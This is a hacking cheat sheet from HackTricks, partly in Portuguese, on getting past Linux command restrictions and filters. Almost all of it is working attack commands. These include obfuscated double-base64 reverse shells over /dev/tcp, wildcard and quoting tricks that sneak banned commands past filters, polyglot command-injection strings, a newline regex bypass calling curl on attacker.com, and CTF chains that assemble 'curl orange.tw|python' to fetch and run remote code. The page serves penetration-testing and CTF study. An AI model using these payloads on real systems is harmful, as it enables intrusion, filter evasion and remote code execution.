# Bypass Linux Restrictions {% hint style="success" %} Aprenda e pratique Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Aprenda e pratique Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
{% endhint %}
\ Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) para construir e **automatizar fluxos de trabalho** facilmente, impulsionados pelas **ferramentas** comunitárias **mais avançadas** do mundo.\ Obtenha Acesso Hoje: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} ## Bypasses de Limitações Comuns ### Reverse Shell ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` ### Shell Rev curta ```bash #Trick from Dikline #Get a rev shell with (sh)0>/dev/tcp/10.10.10.10/443 #Then get the out of the rev shell executing inside of it: exec >&0 ``` ### Bypass Paths e palavras proibidas ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution /usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments touch -- -la # -- stops processing options after the -- ls * echo * #List current files and folders with echo and wildcard # [chars] /usr/bin/n[c] # /usr/bin/nc # Quotes 'p'i'n'g # ping "w"h"o"a"m"i # whoami ech''o test # echo test ech""o test # echo test bas''e64 # base64 #Backslashes \u\n\a\m\e \-\a # uname -a /\b\i\n/////s\h # $@ who$@ami #whoami # Transformations (case, reverse, base64) $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash) $(rev<<<'imaohw') #whoami bash<<<$(base64 -d<< /tmp/[ chmod +x [ export PATH=/tmp:$PATH if [ "a" ]; then echo 1; fi # Will print hello! ``` ### Injeção de comando poliglota ```bash 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ ``` ### Bypass potenciais regexes ```bash # A regex that only allow letters and numbers might be vulnerable to new line characters 1%0a`curl http://attacker.com` ``` ### Bashfuscator ```bash # From https://github.com/Bashfuscator/Bashfuscator ./bashfuscator -c 'cat /etc/passwd' ``` ### RCE com 5 caracteres ```bash # From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge #Oragnge Tsai solution ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date http://host/?cmd=>ls\ http://host/?cmd=ls>_ http://host/?cmd=>\ \ http://host/?cmd=>-t\ http://host/?cmd=>\>g http://host/?cmd=ls>>_ ## Step2: generate `curl orange.tw|python` to file "g" ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file http://host/?cmd=>on http://host/?cmd=>th\ http://host/?cmd=>py\ http://host/?cmd=>\|\ http://host/?cmd=>tw\ http://host/?cmd=>e.\ http://host/?cmd=>ng\ http://host/?cmd=>ra\ http://host/?cmd=>o\ http://host/?cmd=>\ \ http://host/?cmd=>rl\ http://host/?cmd=>cu\ http://host/?cmd=sh _ # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file ## Finally execute the file "g" http://host/?cmd=sh g # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*" https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ ## Execute tar command over a folder http://52.199.204.34/?cmd=>tar http://52.199.204.34/?cmd=>zcf http://52.199.204.34/?cmd=>zzz http://52.199.204.34/?cmd=*%20/h* # Another curiosity if you can read files of the current folder ln /f* ## If there is a file /flag.txt that will create a hard link ## to it in the current folder ``` ### RCE com 4 caracteres ```bash # In a similar fashion to the previous bypass this one just need 4 chars to execute commands # it will follow the same principle of creating the command `ls -t>g` in a file # and then generate the full command in filenames # generate "g> ht- sl" to file "v" '>dir' '>sl' '>g\>' '>ht-' '*>v' # reverse file "v" to file "x", content "ls -th >g" '>rev' '*v>x' # generate "curl orange.tw|python;" '>\;\\' '>on\\' '>th\\' '>py\\' '>\|\\' '>tw\\' '>e.\\' '>ng\\' '>ra\\' '>o\\' '>\ \\' '>rl\\' '>cu\\' # got shell 'sh x' 'sh g' ``` ## Bypass de Somente Leitura/Noexec/Distroless Se você estiver dentro de um sistema de arquivos com as **proteções de somente leitura e noexec** ou até mesmo em um contêiner distroless, ainda há maneiras de **executar binários arbitrários, até mesmo um shell!:** {% content-ref url="bypass-fs-protections-read-only-no-exec-distroless/" %} [bypass-fs-protections-read-only-no-exec-distroless](bypass-fs-protections-read-only-no-exec-distroless/) {% endcontent-ref %} ## Bypass de Chroot e outras Jails {% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md) {% endcontent-ref %} ## Referências & Mais * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) * [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) * [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
\ Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) para construir e **automatizar fluxos de trabalho** facilmente, impulsionados pelas **ferramentas** da comunidade **mais avançadas** do mundo.\ Acesse hoje: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} {% hint style="success" %} Aprenda e pratique Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Aprenda e pratique Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
{% endhint %}